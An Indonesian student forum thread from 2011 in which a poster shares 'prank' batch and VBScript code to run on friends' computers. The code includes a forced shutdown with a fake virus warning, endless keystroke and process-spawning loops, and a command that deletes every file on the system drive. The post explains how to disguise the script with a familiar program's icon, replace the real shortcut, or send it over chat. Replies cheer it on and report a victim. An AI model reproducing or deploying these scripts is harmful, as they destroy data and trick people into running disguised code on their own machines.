Selamat datang di Poltekpos.forumid.net Smile

Untuk saat ini konten kami hanya bisa diakses oleh member..
silahkan mendaftar (register) ,Jika anda sudah menjadi member kami silahkan login terlebih dahulu

Script-scippt "nakal" buat ngisengin teman

Topik sebelumnya Topik selanjutnya Go down

Script-scippt "nakal" buat ngisengin teman

Post by Alfairoe_Sigit on Tue Nov 01, 2011 2:21 pm

Kita pernah mempunyai keinginan untuk mengerjain tmn kan??tapi takut ketahuan??
caranya gampang..yang saya jelaskan dibawah ini merupakan satu dari ribuan script nakal.
caranya gampang kok...teman-teman bisa masukin script ini secara manual...dari online pun bisa..

Untuk yang Online syaratnya ga susah kok Syaratnya yaitu:
- Teman-teman dan calon korban sama-sama online
- Kirim file yang nanti agan bisa buat sendiri via Yahoo Messenger,MSN,Chat FB,Google Talk dll
Cara pertama yang harus kita lakuin yaitu buat file yang akan teman-teman jadikan "Senjata Utama" buat ngerjain...
Sedangkan yang manual syaratnya yaitu
-Ganti icon file iseng kita ini dengan icon program2 desktop yang biasa calon korban kita gunakan (semisal :Mozila,Ms.word,atau game2)..sebisa mungkin dimirip-miripin lah..biar sang korban tidak curiga
-Hapus shortcut program yang asli (bukan file iseng kita!!)
-.Kembalikan laptop atau kompi ke tmn kita...

Oke..sekarang kita langsung buat aja file iseng nya..
- buka notepad..
trus masukin kode2 dibawah ini (Pilih sesuai keinginan teman-teman)

Force Shutdown komputer korban :

@echo off
msg * Komputer Anda Terinfeksi Virus
shutdown -c “Isi Kalimat terserah teman-teman.silahkan berkreasi” -s -t 0

Buka Notepad.exe di komputer korban secara terus menerus:

@echo off
:top
start %SystemRoot%\system32\notepad.exe
goto top

Delete semua file di komputer (*Peringatan!!Bisa menimbulkan wajah babak belur!!)

@echo off
del%systemdrive%*.*/f/s/q/
shutdown -r -f -t 00

Untuk syntax diatas..simpan dengan format:
Nama: Terserah_teman.BAT
Type File : All File

Tombol CAPSLOCK korban nyala terus (jika dimatiin otomaris akan nyala lagi):

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Cd/Dvd Drive korban pop-out terus menerus(jika dimatikan otomatis nyala lagi):
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Tombol ENTER di komputer korbam nyala terus menerus:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Tombil BACKSPACE di komputer korban nyala terus menerus:
MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Komputer korban otomatis mengetik "Kalimat" secara terus menerus:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "Isi Kalimat terserah teman-teman"
loop

Khusus lima syntax diatas ini..simpan dengan format:
Nama: Terserah_teman.VBS
Type File : All File

*Tambahan
-Untuk yang manual..setelah teman-teman ganti shortcut desktop calon korban kita sama file iseng..sebisa mungkin teman-teman langsung pergi (kemana yah terserah alasan ke wc..pulang kek..maen kek..bebas..intinya Kaburrrrrrrr!
-Segala bentuk tindakan teman-teman diluar tanggung jawab saya..saya disini cuma berbagi ilmu..

Ok selamat mencoba..dan jangan salahin saya ya kalo teman yang anda jahilin marah
heheheheeh




SUMBER : From my blog


Signature......................


Member baru harap baca dulu Rules and main point ,
Terima kasih sudah mau mengikuti Rules "Poltekpos.forumid"
avatar
Alfairoe_Sigit
Administrator
Administrator

Kelas : MI-3D
Angkatan : 2009
Join date : 29.10.11
Lokasi : Bandung
Posts : 144

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by YOWA48 on Tue Nov 01, 2011 10:11 pm

Share lagi info-infonya gan.!!!

heheheheeh
avatar
YOWA48
Moderator
Moderator

Kelas : TI 3C
Angkatan : 2009
Join date : 01.11.11
Lokasi : Bandung
Posts : 43

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by Nara_ on Wed Nov 02, 2011 9:54 am

genit kreeen kreen.... mantabz
avatar
Nara_
Forum Member
Forum Member

Kelas : TI 2D
Angkatan : 2010
Join date : 02.11.11
Lokasi : bandoeng
Posts : 22

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by xtreeme007 on Wed Nov 02, 2011 11:35 am

dah gw coba gan....

dan si korban langsung ngamuk2 ke gw.....

kkwowowkwokwowkowk Very Happy
avatar
xtreeme007
Super Moderator
Super Moderator

Join date : 31.10.11
Lokasi : lampung
Posts : 7

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by Alfairoe_Sigit on Wed Nov 02, 2011 1:21 pm

MAS BOY wrote: genit kreeen kreen.... mantabz

sip...kita sama2 sharing ilmu ya heheheheeh

btw..udah isi buku tamu blum??

silahkan kesini http://poltekpos.forumid.net/t3-absen-dimari

xtreeme007 wrote:dah gw coba gan....

dan si korban langsung ngamuk2 ke gw.....

kkwowowkwokwowkowk Very Happy
wakakakak

lo nyoba yang mana mi??
jangan2 yang delete semua file dikomputer ya? Grrrrrrrr


Signature......................


Member baru harap baca dulu Rules and main point ,
Terima kasih sudah mau mengikuti Rules "Poltekpos.forumid"
avatar
Alfairoe_Sigit
Administrator
Administrator

Kelas : MI-3D
Angkatan : 2009
Join date : 29.10.11
Lokasi : Bandung
Posts : 144

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by YOWA48 on Thu Nov 03, 2011 9:28 pm

ada pertanyaan nih,.!!!
CARA NGEBALIKINYA GIMANA.!!!

MUST REPLAY.!!!


Tiada Maaf Bagi Thread Yang Berbau Pornografi
avatar
YOWA48
Moderator
Moderator

Kelas : TI 3C
Angkatan : 2009
Join date : 01.11.11
Lokasi : Bandung
Posts : 43

Kembali Ke Atas Go down

Re: Script-scippt "nakal" buat ngisengin teman

Post by Sponsored content


Sponsored content


Kembali Ke Atas Go down

Topik sebelumnya Topik selanjutnya Kembali Ke Atas


 
Permissions in this forum:
Anda tidak dapat menjawab topik